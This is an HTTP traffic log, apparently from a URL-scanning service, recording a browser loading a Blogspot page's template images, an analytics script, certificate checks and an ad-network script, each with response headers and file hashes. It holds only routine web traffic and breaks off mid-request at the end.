alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 640 x 25, 8-bit/color RGBA, non-interlaced\012- data
Size:   6258
Md5:    d137256a5e1859d34a9ad54698d0c64a
Sha1:   651cc386ee0c89a34cf74d67ef87affccf1fef13
Sha256: 455333141a5a89a853f59d7990fb6c05f1d49690bf46f673943b8b4c272fa2d2
                                        
                                            GET /ga.js HTTP/1.1 
Host: www.google-analytics.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/

                                        
                                             142.250.74.174
HTTP/1.1 200 OK
Content-Type: text/javascript
                                            
Strict-Transport-Security: max-age=10886400; includeSubDomains; preload
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Encoding: gzip
Cross-Origin-Resource-Policy: cross-origin
Server: Golfe2
Content-Length: 17168
Date: Mon, 28 Nov 2022 11:05:59 GMT
Expires: Mon, 28 Nov 2022 13:05:59 GMT
Cache-Control: public, max-age=7200
Age: 1423
Last-Modified: Tue, 27 Sep 2022 22:01:05 GMT


--- Additional Info ---
Magic:  ASCII text, with very long lines (1305)
Size:   17168
Md5:    01d5892e6e243b52998310c2925b9f3a
Sha1:   58180151b6a6ee4af73583a214b68efb9e8844d4
Sha256: 7e90efb4620a78e8869796d256bcddbde90b853c8c15c5cc116cb11d3d17bc4d
                                        
                                            GET /-TUHW6weJdII/V3euSQGBdBI/AAAAAAAACKk/YuWGP63yx9ocnBGLedNhQc_RyKmNa7_kgCLcB/s1600/aegygeek-responsive-blogger-template.jpg HTTP/1.1 
Host: 2.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                        
                                             142.250.74.161
HTTP/2 200 OK
content-type: image/jpeg
                                            
access-control-expose-headers: Content-Length
etag: "v8aa"
expires: Tue, 29 Nov 2022 11:29:42 GMT
cache-control: public, max-age=86400, no-transform
content-disposition: inline;filename="aegygeek-responsive-blogger-template.jpg"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Mon, 28 Nov 2022 11:29:42 GMT
server: fife
content-length: 91341
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=4, orientation=upper-left, software=Google], progressive, precision 8, 622x222, components 3\012- data
Size:   91341
Md5:    4793e9ad46f482da75218e1678557d9f
Sha1:   c6763c7a9296f2f7b0f791e33e6acf3f8c1df287
Sha256: 87fd05f7d741809739e1f2ad512d73262a041036ec401fa6172aadca62dcd274
                                        
                                            GET /-fYrniOWe0do/T-bV9-KX_0I/AAAAAAAABc8/1R5XL63DoCY/s640/medium_middle.png HTTP/1.1 
Host: lh5.googleusercontent.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                        
                                             142.250.74.33
HTTP/2 200 OK
content-type: image/png
                                            
access-control-expose-headers: Content-Length
etag: "v5cf"
expires: Tue, 29 Nov 2022 11:29:42 GMT
cache-control: public, max-age=86400, no-transform
content-disposition: inline;filename="medium_middle.png"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Mon, 28 Nov 2022 11:29:42 GMT
server: fife
content-length: 443
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 640 x 25, 8-bit/color RGBA, non-interlaced\012- data
Size:   443
Md5:    6a220bd5eee1d0280feabee4cec98b73
Sha1:   a671b1cc43c3eb8a3f356b955b8eb0af500d2ef2
Sha256: bf3e7b6816ba73c4874c99c5978f086f0301d161d8fd325e4d48e75dc38fbba0
                                        
                                            GET /-44-Prs7o7ns/T-bV8INVVII/AAAAAAAABck/lPhDe2mNiZA/s1600/large_middle.png HTTP/1.1 
Host: lh4.googleusercontent.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                        
                                             142.250.74.33
HTTP/2 200 OK
content-type: image/png
                                            
access-control-expose-headers: Content-Length
etag: "v5c9"
expires: Tue, 29 Nov 2022 11:29:42 GMT
cache-control: public, max-age=86400, no-transform
content-disposition: inline;filename="large_middle.png"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Mon, 28 Nov 2022 11:29:42 GMT
server: fife
content-length: 478
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 990 x 25, 8-bit/color RGBA, non-interlaced\012- data
Size:   478
Md5:    b3f1f3935dbdc832150844268dd9d923
Sha1:   21cd216384b17430058cdeaa170bc48ba9068a6e
Sha256: 9360e89cfd07c806786966bb50356349814621ce2b874ee6f36fbeddce8baa2b
                                        
                                            GET /-iIWxSFnJL70/T-bWD5CgVmI/AAAAAAAABeQ/7idxHA_Kyb0/s330/small_middle.png HTTP/1.1 
Host: lh6.googleusercontent.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                        
                                             142.250.74.33
HTTP/2 200 OK
content-type: image/png
                                            
access-control-expose-headers: Content-Length
etag: "v5e4"
expires: Tue, 29 Nov 2022 11:29:42 GMT
cache-control: public, max-age=86400, no-transform
content-disposition: inline;filename="small_middle.png"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Mon, 28 Nov 2022 11:29:42 GMT
server: fife
content-length: 407
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 330 x 25, 8-bit/color RGBA, non-interlaced\012- data
Size:   407
Md5:    8f33028bd5c85178d45af10b75e25d5e
Sha1:   5c73e90012ce7a6a34a26e02102e4290e633bcc1
Sha256: 253818ef3f0d725eb4d2a31a6061e5cb9e750aac04704e5597e3b9f823381ac4
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Accept-Ranges: bytes
Age: 4439
Cache-Control: max-age=161134
Date: Mon, 28 Nov 2022 11:29:42 GMT
Etag: "63845cbd-116"
Expires: Wed, 30 Nov 2022 08:15:16 GMT
Last-Modified: Mon, 28 Nov 2022 07:01:17 GMT
Server: ECS (ska/F717)
X-Cache: HIT
Content-Length: 278

                                        
                                            GET /-LW5hMrQJWhY/VhhpYiXw4UI/AAAAAAAAB_A/3MEoLdD58bQ/s1600/corner_sprite.png HTTP/1.1 
Host: 1.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/

                                        
                                             142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/png
                                            
Access-Control-Expose-Headers: Content-Length
ETag: "v7f1"
Expires: Tue, 29 Nov 2022 11:29:42 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="corner_sprite.png"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Mon, 28 Nov 2022 11:29:42 GMT
Server: fife
Content-Length: 9532
X-XSS-Protection: 0


--- Additional Info ---
Magic:  PNG image data, 79 x 474, 8-bit/color RGBA, non-interlaced\012- data
Size:   9532
Md5:    a3dfc2028b8f3e93da12f19ab1c3fabc
Sha1:   d4acfd284fc0eafc3c8b33a830dd3e7e64709d16
Sha256: 376c08eafa244e968b2f71886c86af05231577fe7a7f307f364ee0629de4a302
                                        
                                            GET /-ErLhf0FryQA/V_uitwolsYI/AAAAAAAACMk/BE1XMVAivVoEqpoBrWr1QkxoMlhe1-nlQCLcB/s1600/food-blog-premium-version.jpg HTTP/1.1 
Host: 3.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                        
                                             142.250.74.161
HTTP/2 200 OK
content-type: image/jpeg
                                            
access-control-expose-headers: Content-Length
etag: "v8ca"
expires: Tue, 29 Nov 2022 11:29:42 GMT
cache-control: public, max-age=86400, no-transform
content-disposition: inline;filename="food-blog-premium-version.jpg"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Mon, 28 Nov 2022 11:29:42 GMT
server: fife
content-length: 141169
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=4, orientation=upper-left, software=Google], progressive, precision 8, 622x222, components 3\012- data
Size:   141169
Md5:    ee2d9bfe9dbc94858e913b8a369a991a
Sha1:   138daf4d600388013894f2c3cba5ab166b98386d
Sha256: ecc3de161f84fd51ed99ec22155f7171c79226474adc14694d75f8e4d80ed8b0
                                        
                                            GET /-I4PE7R-2024/T-bWDuiPxxI/AAAAAAAABeI/Uebru2XxTNc/s640/post_footer_bottom.png HTTP/1.1 
Host: lh4.googleusercontent.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                        
                                             142.250.74.33
HTTP/2 200 OK
content-type: image/png
                                            
access-control-expose-headers: Content-Length
etag: "v5e2"
expires: Tue, 29 Nov 2022 11:29:42 GMT
cache-control: public, max-age=86400, no-transform
content-disposition: inline;filename="post_footer_bottom.png"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Mon, 28 Nov 2022 11:29:42 GMT
server: fife
content-length: 3286
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 640 x 25, 8-bit/color RGBA, non-interlaced\012- data
Size:   3286
Md5:    3a6be25d41695b6af8b03f6dfd70f42e
Sha1:   1b3e4927acbb36d4967eb581acaf94fb97d9ad5c
Sha256: 2cfa325001fa7c8ebb3039da788f0396bdeb2dfa1fbfde72a7c4d3100b7a49c6
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Date: Mon, 28 Nov 2022 11:29:42 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Date: Mon, 28 Nov 2022 11:29:42 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /-jQg8AZf4WPI/V52lC5IGGzI/AAAAAAAACLs/JOtmZ_dXSxAgGj1MXUguiq8bj89g3x92gCLcB/s1600/dzine-blogger-template.jpg HTTP/1.1 
Host: 4.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                        
                                             142.250.74.161
HTTP/2 200 OK
content-type: image/jpeg
                                            
access-control-expose-headers: Content-Length
etag: "v8bc"
expires: Tue, 29 Nov 2022 11:29:42 GMT
cache-control: public, max-age=86400, no-transform
content-disposition: inline;filename="dzine-blogger-template.jpg"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Mon, 28 Nov 2022 11:29:42 GMT
server: fife
content-length: 100489
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=4, orientation=upper-left, software=Google], progressive, precision 8, 622x222, components 3\012- data
Size:   100489
Md5:    ca59671ec67e51ade3e97ec45cb41f71
Sha1:   4ea8247b457b244d960d25fbf44099012785b730
Sha256: 27c826524f17f7ce108bee9a365e44263048ac9c3e185c701bf0acc67a40c4cc
                                        
                                            GET /-MUjXU6sEW2M/T-bWEaXUQmI/AAAAAAAABeo/ETNcwQHlLsg/s174/social_links.png HTTP/1.1 
Host: lh4.googleusercontent.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                        
                                             142.250.74.33
HTTP/2 200 OK
content-type: image/png
                                            
access-control-expose-headers: Content-Length
content-disposition: inline;filename="social_links.png"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
server: fife
content-length: 7320
x-xss-protection: 0
date: Mon, 28 Nov 2022 11:29:42 GMT
expires: Wed, 23 Nov 2022 05:25:06 GMT
cache-control: public, max-age=86400, no-transform
etag: "v5ea"
age: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 174 x 83, 8-bit/color RGBA, non-interlaced\012- data
Size:   7320
Md5:    4d7176e4c6c43a40b3c7cd23c48752b6
Sha1:   37d94e6cdceb41ad237f278d700d6766e503742c
Sha256: 4db644164eb2a64375166be91759ce87123ac4d6560755315207dd9bf5f8ac98
                                        
                                            GET /-yvTynHzIC58/T-bV7rGRZLI/AAAAAAAABcY/9jtcxJ9VIn8/s1600/large_bottom.png HTTP/1.1 
Host: lh6.googleusercontent.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                        
                                             142.250.74.33
HTTP/2 200 OK
content-type: image/png
                                            
access-control-expose-headers: Content-Length
content-disposition: inline;filename="large_bottom.png"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
server: fife
content-length: 1726
x-xss-protection: 0
date: Mon, 28 Nov 2022 11:29:42 GMT
expires: Fri, 25 Nov 2022 03:55:58 GMT
cache-control: public, max-age=86400, no-transform
etag: "v5c6"
age: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 990 x 25, 8-bit/color RGBA, non-interlaced\012- data
Size:   1726
Md5:    85f8921f08646b9a9617542e50f29016
Sha1:   ad3410e21f751e7fa79939a9f0b73312f1cca095
Sha256: cfbb7369f1f6dd827dbbdfd3e96cf3a064835d78a0eacb26989233ba926a1e0c
                                        
                                            GET /-vFPW0hiUXYU/T-bV9Ri2j5I/AAAAAAAABc0/-Zic4x7j_IY/s640/medium_header.png HTTP/1.1 
Host: lh6.googleusercontent.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                        
                                             142.250.74.33
HTTP/2 200 OK
content-type: image/png
                                            
access-control-expose-headers: Content-Length
content-disposition: inline;filename="medium_header.png"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
server: fife
content-length: 1360
x-xss-protection: 0
date: Mon, 28 Nov 2022 11:29:42 GMT
expires: Wed, 23 Nov 2022 02:47:25 GMT
cache-control: public, max-age=86400, no-transform
etag: "v5cd"
age: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 640 x 25, 8-bit/color RGBA, non-interlaced\012- data
Size:   1360
Md5:    a8ccfc48d311e9a4dddc93e4d05f5603
Sha1:   fa642249cc07930cfd0c180f92328a55904b838b
Sha256: 6e5f59454e1c0ce04c0a82ca40d396b85b0925db757308cc92c9168ce333534f
                                        
                                            GET /-o3q71xr5Bjo/T-bV-m1uL7I/AAAAAAAABdQ/ba_8cAsWCdw/s101/notes_button.png HTTP/1.1 
Host: lh3.googleusercontent.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                        
                                             142.250.74.33
HTTP/2 200 OK
content-type: image/png
                                            
access-control-expose-headers: Content-Length
etag: "v5d4"
expires: Tue, 29 Nov 2022 11:29:42 GMT
cache-control: public, max-age=86400, no-transform
content-disposition: inline;filename="notes_button.png"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Mon, 28 Nov 2022 11:29:42 GMT
server: fife
content-length: 4312
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 101 x 91, 8-bit/color RGBA, non-interlaced\012- data
Size:   4312
Md5:    7a176419fde90938dbac0b82c27abb91
Sha1:   036d13a02aede00ba861e7f89eef028364d448df
Sha256: 55b5a50b8ec50e697a5bc483e98ba4adf252e7c874c7bbd44638b7ebb98db838
                                        
                                            GET /-gTTAkcBqWWo/T-bWDVSASyI/AAAAAAAABeM/Urdg4dQAps0/s330/small_header.png HTTP/1.1 
Host: lh4.googleusercontent.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                        
                                             142.250.74.33
HTTP/2 200 OK
content-type: image/png
                                            
access-control-expose-headers: Content-Length
etag: "v5e3"
expires: Tue, 29 Nov 2022 11:29:42 GMT
cache-control: public, max-age=86400, no-transform
content-disposition: inline;filename="small_header.png"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Mon, 28 Nov 2022 11:29:42 GMT
server: fife
content-length: 1287
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 330 x 25, 8-bit/color RGBA, non-interlaced\012- data
Size:   1287
Md5:    079a49db9953e91bf97db6d37a7f3f0e
Sha1:   21648d34582621af3c77b19ae8783974b620309a
Sha256: a8513813e641d531ba34b81172ce8882d0e133f42262d45ca784c46b44447984
                                        
                                            GET /-jQg8AZf4WPI/V52lC5IGGzI/AAAAAAAACLs/JOtmZ_dXSxAgGj1MXUguiq8bj89g3x92gCLcB/s72-c/dzine-blogger-template.jpg HTTP/1.1 
Host: 4.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                        
                                             142.250.74.161
HTTP/2 200 OK
content-type: image/jpeg
                                            
access-control-expose-headers: Content-Length
etag: "v8bc"
expires: Tue, 29 Nov 2022 11:29:42 GMT
cache-control: public, max-age=86400, no-transform
content-disposition: inline;filename="dzine-blogger-template.jpg"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Mon, 28 Nov 2022 11:29:42 GMT
server: fife
content-length: 2959
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 72x72, components 3\012- data
Size:   2959
Md5:    20c77f2ccbbd6ecafb0458320b4efea9
Sha1:   b51b650babec1d1274fa6e8fe7fbac74b67b882b
Sha256: e994e37d76bacf23352f297086d5b6fcd67b9cae9577e4115a0128c8fd45e480
                                        
                                            GET /-iiok5D_8j7I/T-bWDUPfXSI/AAAAAAAABd8/Z9OoeKDlgrk/s330/small_footer.png HTTP/1.1 
Host: lh3.googleusercontent.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                        
                                             142.250.74.33
HTTP/2 200 OK
content-type: image/png
                                            
access-control-expose-headers: Content-Length
etag: "v5df"
expires: Tue, 29 Nov 2022 11:29:42 GMT
cache-control: public, max-age=86400, no-transform
content-disposition: inline;filename="small_footer.png"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Mon, 28 Nov 2022 11:29:42 GMT
server: fife
content-length: 1573
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 330 x 25, 8-bit/color RGBA, non-interlaced\012- data
Size:   1573
Md5:    6c236a232dc93b787441d430b97fc54a
Sha1:   318750161c9bd1c4ffb660771774fc05befe07dd
Sha256: 5b35c11221f5040c75c017c23226f93fe1cefcb3eb4b79a098210563e43941c1
                                        
                                            GET /gtw.js?_=0.6459504740940876 HTTP/1.1 
Host: gt.hsoub.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/

                                        
                                             52.215.62.169
HTTP/1.1 200 OK
Content-Type: text/javascript;charset=utf-8
                                            
Date: Mon, 28 Nov 2022 11:29:42 GMT
Content-Length: 0
Connection: keep-alive
Status: 200 OK
Access-Control-Allow-Origin: *
Expires: Sat, 1 Jan 2000 01:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Server: Hsoub Nginx
Set-Cookie: rack.session=IVlMtvJgCt5XeioEyJZknVaU4WPZu4KuffwHdfOO4aQhIIyS1DCT1owcqdwHWlJlnt%2FXwUU5Taey9pc5frVwmrUR6ZlGGLnKeWAwrsJ5T6o%3D; path=/
X-Powered-By: Hsoub, Phusion Passenger

                                        
                                            GET /iframe HTTP/1.1 
Host: gt.hsoub.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
